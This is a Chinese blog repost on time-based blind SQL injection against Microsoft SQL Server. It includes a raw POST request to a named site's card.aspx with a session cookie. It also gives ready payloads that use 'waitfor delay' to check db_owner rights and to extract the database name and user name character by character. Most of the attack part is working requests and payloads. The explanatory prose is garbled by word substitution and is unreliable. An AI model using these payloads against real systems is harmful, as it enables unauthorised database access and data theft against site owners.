|
|
|
联系客服020-83701501

盲注-延时注入

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
盲注-延时注入

注入的基础知识就不说的了,只是在这里做个繁杂的条记,以便当前拿起了就用。

Default
123456789101112 POST /card.aspx HTTP/1.1Content-Length: 96Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestCookie: ASP.NET_SessionId=2k32d0nwvrzpbg55qucudt3bHost: www.cunlide.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept: */* cardid=1&cardpwd=1&Submit2=1&username=pxnjodhe%27%3b%20waitfor%20delay%20%270%3a0%3a5%27%20--%20

看POST数据,注入是发作在username这里。把username的值URL解码下何等角力总计显明点。

Default
123 pxnjodhe%27%3b%20waitfor%20delay%20%270%3a0%3a5%27%20--%20 pxnjodhe'; waitfor delay '0:0:5' --

 

由于延时注入是经过页面返回的工夫来果断的,所以当我截止猜解的时候也便是用工夫来截止猜解,好比咱们概略掏出db_name的第一个字符,先转换 成ASCII在和数字截止角力总计(推荐使用<、>),在角力总计时咱们概略用半数法,好比咱们先猜解第一个字符是大写字母还是小写字母,即概略用 91来做个规范小于91的为大写字母(A-F,概略是_ 、-),大于则反。

上面两个语句为例子:

 

Default
123456 cardid=1&amp;cardpwd=1&amp;Submit2=1&amp;username=pxnjodhe%27;if%20(0%3D(SELECT%20IS_MEMBER ('db_owner')))%20waitfor%20delay%20%270:0:11%27%20--%20//果断权限cardid=1&amp;cardpwd=1&amp;Submit2=1&amp;username=pxnjodhe%27;if(ascii(substring(db_name(),1,1)))&gt;40%20waitfor%20delay%20%270:0:2%27%20--%20//数据库名cardid=1&amp;cardpwd=1&amp;Submit2=1&amp;username=pxnjodhe%27;if(ascii(substring(user_name(),1,1)))&gt;115%20waitfor%20delay%20%270:0:1%27%20--%20//用户名

 

倡议用时但编码状态出标题问题时,概略试试未编码状态。

如有舛错赐正下。

link:http://www.cunlide.com/?post=80

本文由网络平安攻防研究室(www.91ri.org)动静平安小组收集整理,转载请阐明因由。

数安新闻+更多

证书相关+更多